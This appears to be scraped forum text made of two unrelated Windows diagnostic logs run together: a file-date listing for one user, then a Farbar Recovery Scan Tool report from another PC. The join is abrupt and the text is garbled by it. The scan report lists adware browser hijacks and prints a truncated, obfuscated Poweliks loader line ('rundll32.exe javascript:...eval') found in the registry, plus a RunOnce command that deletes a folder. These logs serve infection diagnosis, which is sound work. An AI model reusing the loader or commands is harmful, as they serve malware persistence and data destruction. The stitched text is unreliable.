- 2015-04-06 18:25 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\PTC 2015-04-06 18:25 - 2015-04-06 18:25 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\NVIDIA 2015-04-06 18:25 - 2015-04-06 18:25 - 00000000 ____D () C:\Users\tboe\AppData\Local\PTC 2015-04-06 18:23 - 2015-04-06 18:25 - 00001731 _____ () C:\Users\tboe\Desktop\Creo2_Flex3.lnk 2015-04-06 18:22 - 2015-04-23 14:01 - 00070872 _____ () C:\Users\tboe\AppData\Local\GDIPFONTCACHEV1.DAT 2015-04-06 18:22 - 2015-04-06 18:22 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\Intel Corporation 2015-04-06 18:21 - 2015-04-16 12:42 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\Adobe 2015-04-06 18:21 - 2015-04-06 18:21 - 00001419 _____ () C:\Users\tboe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk 2015-04-06 18:21 - 2015-04-06 18:21 - 00000020 ___SH () C:\Users\tboe\ntuser.ini 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\Documents\My Received Files 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\PC Tech Hotline 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\AppData\Roaming\Intel 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\AppData\Local\VirtualStore 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe\AppData\Local\NVIDIA 2015-04-06 18:21 - 2015-04-06 18:21 - 00000000 ____D () C:\Users\tboe 2015-04-06 18:21 - 2009-07-13 23:54 - 00000000 ___RD () C:\Users\tboe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories 2015-04-06 18:21 - 2009-07-13 23:49 - 00000000 ___RD () C:\Users\tboe\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance 2015-04-03 10:25 - 2015-04-03 10:25 - 00000790 _____ () C:\Users\Public\Documents\trail.txt.2 2015-04-03 10:24 - 2015-04-03 10:24 - 00000426 _____ () C:\Users\Public\Documents\mech_trl.txt.2 2015-04-03 10:16 - 2015-04-03 10:16 - 00000426 _____ () C:\Users\Public\Documents\mech_trl.txt.1 2015-04-03 
10:14 - 2015-04-03 10:25 - 00000112 _____ () C:\Users\Public\Documents\std.err 2015-04-03 10:14 - 2015-04-03 10:15 - 00001200 _____ () C:\Users\Public\Documents\trail.txt.1 2015-04-03 09:15 - 2015-04-03 09:15 - 00000000 ____D () C:\Windows\system32\appmgmt 2015-04-03 09:12 - 2015-04-03 09:12 - 00002002 _____ () C:\Users\Public\Desktop\Structure.lnk 2015-04-03 09:12 - 2015-04-03 09:12 - 00001992 _____ () C:\Users\Public\Desktop\Thermal.lnk 2015-04-03 09:12 - 2015-04-03 09:12 - 00001830 _____ () C:\Users\Public\Desktop\Creo Simulate 2.0.lnk 2015-04-03 09:11 - 2015-04-03 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PTC Creo 2015-04-03 08:48 - 2015-02-19 23:41 - 00041984 _____ (Microsoft Corporation) C:\Windows\system32\lpk.dll 2015-04-03 08:48 - 2015-02-19 23:40 - 00100864 _____ (Microsoft Corporation) C:\Windows\system32\fontsub.dll 2015-04-03 08:48 - 2015-02-19 23:40 - 00046080 _____ (Adobe Systems) C:\Windows\system32\atmlib.dll 2015-04-03 08:48 - 2015-02-19 23:40 - 00014336 _____ (Microsoft Corporation) C:\Windows\system32\dciman32.dll 2015-04-03 08:48 - 2015-02-19 23:13 - 00070656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fontsub.dll 2015-04-03 08:48 - 2015-02-19 23:13 - 00034304 _____ (Adobe Systems) C:\Windows\SysWOW64\atmlib.dll 2015-04-03 08:48 - 2015-02-19 23:13 - 00010240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dciman32.dll 2015-04-03 08:48 - 2015-02-19 23:12 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\lpk.dll 2015-04-03 08:48 - 2015-02-19 22:29 - 00372224 _____ (Adobe Systems Incorporated) C:\Windows\system32\atmfd.dll 2015-04-03 08:48 - 2015-02-19 22:09 - 00299008 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll 2015-04-03 08:48 - 2015-02-02 22:34 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi 2015-04-03 08:48 - 2015-02-02 22:34 - 00094656 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys 2015-04-03 08:48 - 2015-02-02 22:33 - 
00616360 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi 2015-04-03 08:48 - 2015-02-02 22:31 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 04121600 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00037376 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msmmsp.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll 2015-04-03 08:48 - 2015-02-02 22:31 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx 2015-04-03 08:48 - 2015-02-02 22:31 - 00005120 _____ (Microsoft Corporation) 
Addition.txt FRST.txt
  21. Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 10-11-2014 Ran by Ryan (administrator) on RYAN-PC on 12-11-2014 16:21:33 Running from C:\Users\Ryan\Downloads Loaded Profile: Ryan (Available profiles: Ryan) Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States) Internet Explorer Version 11 Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe (Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe (Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe (Alcatel-Lucent) C:\Program Files (x86)\Common Files\Motive\pcCMService.exe (Alcatel-Lucent) C:\Program Files\Common Files\Motive\pcCMService.exe (Alcatel-Lucent) C:\Program Files (x86)\Common Files\Motive\pcServiceHost.exe (Intuit) C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE (Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler.exe (Google Inc.) 
C:\Program Files (x86)\Google\Update\1.3.25.5\GoogleCrashHandler64.exe (Symantec Corporation) C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\n360.exe () C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe (Alcatel-Lucent) C:\Program Files\ATT-SST\pcTrayApp.exe (Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe (SwapDrive, Inc.) C:\Program Files (x86)\QuickBooks Online Backup\OnlineBackup.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (CyberLink) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe (TechSmith Corporation) C:\Program Files (x86)\TechSmith\Jing\Jing.exe (Spotify Ltd) C:\Users\Ryan\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe (Alcatel-Lucent) C:\Program Files (x86)\Common Files\Motive\pcContextHookShim.exe (Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe (Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Dropbox, Inc.) 
C:\Users\Ryan\AppData\Roaming\Dropbox\bin\Dropbox.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe (Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Microsoft Corporation) C:\Windows\System32\msiexec.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [NvCplDaemon] => RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup HKLM\...\Run: [smartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [610360 2009-09-14] () HKLM\...\Run: [PC-Doctor for Windows localizer] => C:\Program Files\PC-Doctor for Windows\localizer.exe [95728 2009-09-16] (PC-Doctor, Inc.) HKLM\...\Run: [ATT-SST_McciTrayApp] => C:\Program Files\ATT-SST\pcTrayApp.exe [2727936 2012-06-07] (Alcatel-Lucent) HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.) HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.) 
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard) HKLM-x32\...\RunOnce: [DelTr1171583] => cmd.exe /c rd /s /q "C:\Users\Ryan\AppData\Roaming\WSE_Lasaoren" HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [HPADVISOR] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe [1685048 2009-09-29] (Hewlett-Packard) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [OnlineBackupScheduler] => C:\Program Files (x86)\QuickBooks Online Backup\OnlineBackup.exe [610304 2007-11-02] (SwapDrive, Inc.) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [AdobeBridge] => [X] HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [43816 2014-10-17] (Apple Inc.) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [43816 2014-10-17] (Apple Inc.) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [Jing] => C:\Program Files (x86)\TechSmith\Jing\Jing.exe [2909640 2013-01-07] (TechSmith Corporation) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [spotify] => C:\Users\Ryan\AppData\Roaming\Spotify\Spotify.exe [6553144 2014-10-08] (Spotify Ltd) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [spotify Web Helper] => C:\Users\Ryan\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1514040 2014-10-08] (Spotify Ltd) HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [bRS] => C:\Program Files (x86)\WSE_Astromenda\BRS\brs.exe -runBRS HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\Run: [skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [22065760 2014-10-01] (Skype Technologies S.A.) 
HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\RunOnce: [DelTr1171583] => cmd.exe /c rd /s /q "C:\Users\Ryan\AppData\Roaming\WSE_Lasaoren" HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...\RunOnce: [WSE_Lasaoren] => [X] HKU\S-1-5-21-3275123363-4289498944-2812251985-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass FF RunOnce.lnk ShortcutTarget: Install LastPass FF RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Install LastPass IE RunOnce.lnk ShortcutTarget: Install LastPass IE RunOnce.lnk -> C:\Program Files (x86)\Common Files\lpuninstall.exe (LastPass) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Online Backup Scheduler.lnk ShortcutTarget: Online Backup Scheduler.lnk -> C:\Windows\Installer\{A9255718-8A40-45F9-B738-93655FBD4F6F}\_C90BDFE323B95CEE248723.exe () Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\PictureMover.lnk ShortcutTarget: PictureMover.lnk -> C:\Program Files (x86)\PictureMover\Bin\PictureMover.exe (Hewlett-Packard Company) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.) Startup: C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk ShortcutTarget: Dropbox.lnk -> C:\Users\Ryan\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) 
Startup: C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://Lasaoren.com/...cr=90030310&ir= HKCU\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = http://www.mysearchlinks.com/ SearchScopes: HKLM - DefaultScope {5E6E1618-3BEA-4A6A-AC43-80B3F54CE1CB} URL = http://astromenda.co...=1230190011&ir= SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM - {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = http://Lasaoren.com/...cr=90030310&ir= SearchScopes: HKLM - {5E6E1618-3BEA-4A6A-AC43-80B3F54CE1CB} URL = http://astromenda.co...=1230190011&ir= SearchScopes: HKLM - {CCA70054-9FB7-46C4-A32D-B64843035997} URL = http://www.ask.com/w...}&l=dis&o=ushpd SearchScopes: HKLM-x32 - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 - {CCA70054-9FB7-46C4-A32D-B64843035997} URL = http://www.ask.com/w...}&l=dis&o=ushpd SearchScopes: HKCU - DefaultScope {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = http://Lasaoren.com/...cr=90030310&ir= SearchScopes: HKCU - {2E00D31D-D171-423D-836D-1A4D7EA7F1A9} URL = http://Lasaoren.com/...cr=90030310&ir= SearchScopes: HKCU - {5E6E1618-3BEA-4A6A-AC43-80B3F54CE1CB} URL = http://astromenda.co...=1230190011&ir= SearchScopes: HKCU - {9AD1DDCA-9138-4F37-8542-E774CE72FEDC} URL = http://search.yahoo....rtPage?}&fr=ie8 SearchScopes: HKCU - {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = http://www.ask.com/w...il&geo=US&ver=4 SearchScopes: HKCU - {CCA70054-9FB7-46C4-A32D-B64843035997} URL = http://www.ask.com/w...}&l=dis&o=ushpd SearchScopes: HKCU - {EFBAA18C-764F-4320-A142-84ACC4C3AF65} URL = http://search.usatod...w={searchTerms} BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) 
BHO: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar_x64.dll () BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation) BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard) BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation) BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation) BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) BHO-x32: LastPass Vault -> {95D9ECF5-2A4D-4550-BE49-70D42F71296E} -> C:\Program Files (x86)\LastPass\LPToolbar.dll () BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) BHO-x32: Microsoft Live Search Toolbar Helper -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.) 
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard) Toolbar: HKLM - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar_x64.dll () Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation) Toolbar: HKLM-x32 - Microsoft Live Search Toolbar - {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0566.0\msneshellx.dll (Microsoft Corp.) Toolbar: HKLM-x32 - LastPass Toolbar - {9f6b5cc3-5c7b-4b5c-97af-19dec1e380e5} - C:\Program Files (x86)\LastPass\LPToolbar.dll () Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation) Toolbar: HKU\S-1-5-21-3275123363-4289498944-2812251985-1000 -> No Name - {604BC32A-9680-40D1-9AC6-E06B23A1BA4C} - No File Handler: intu-help-qb3 - {c5e479ea-0a65-4b05-8c6c-2fc8cc682eb4} - No File Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - No File Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation) Handler-x32: intu-help-qb3 - {c5e479ea-0a65-4b05-8c6c-2fc8cc682eb4} - C:\Program Files (x86)\Intuit\QuickBooks 2010\HelpAsyncPluggableProtocol.dll (Intuit, Inc.) 
Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\SysWOW64\mscoree.dll (Microsoft Corporation) Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation) Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 FireFox: ======== FF ProfilePath: C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default FF DefaultSearchEngine: Lasaoren FF SearchEngineOrder.3: Bing FF SelectedSearchEngine: Lasaoren FF Homepage: hxxp://lasaoren.com/?f=1&a=lrn_dnldstr_14_46_ff&cd=2xzuyetn2y1l1qzu0etd0c0bye0eyb0d0czyydzytbtctbtdtn0d0tzu0stctdyeybtn1l2xzutatfyctftctftdtn1l1czutcyetbzytdyd1v1ttn1l1g1b1v1n2y1l1qzu2syc0c0btayd0fzyyetgzztb0etbtgzzyezztctgybyctcyetgtctatczzzyybtctb0b0b0ftd2qtn1m1f1b2z1v1n2y1l1qzu2stcybzz0byc0byd0atg0dtd0e0ctgyetd0a0etgzyybyezztg0eyd0fta0d0dta0ftdzzzyye2q&cr=90030310&ir= FF Keyword.URL: hxxp://www.bing.com/search?FORM=UP97DF&PC=UP97&q= FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_223.dll () FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll No File FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_223.dll () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @cnw.com/cnwplugin -> C:\Program Files (x86)\AnyMeeting Plug-in\npcnwplugin.dll (AnyMeeting, Inc.) 
FF Plugin-x32: @java.com/DTPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.51.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\Common Files\Motive\npMotive.dll (Alcatel-Lucent)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3275123363-4289498944-2812251985-1000: @citrixonline.com/appdetectorplugin -> C:\Users\Ryan\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKU\S-1-5-21-3275123363-4289498944-2812251985-1000: @hulu.com/Hulu Desktop -> C:\Windows\..\Users\Default\AppData\Local\HuluDesktop\instances\0.9.9.1\npHDPlg.dll (Hulu LLC)
FF Plugin HKU\S-1-5-21-3275123363-4289498944-2812251985-1000: tdameritrade.com/thinkorswim -> C:\Program Files (x86)\thinkorswim\npthinkorswim.dll (TD Ameritrade)
FF Plugin HKU\S-1-5-21-3275123363-4289498944-2812251985-1000: tdameritrade.com/tossc -> C:\Program Files (x86)\thinkorswim\nptossc.dll (TD Ameritrade)
FF user.js: detected! => C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\user.js
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
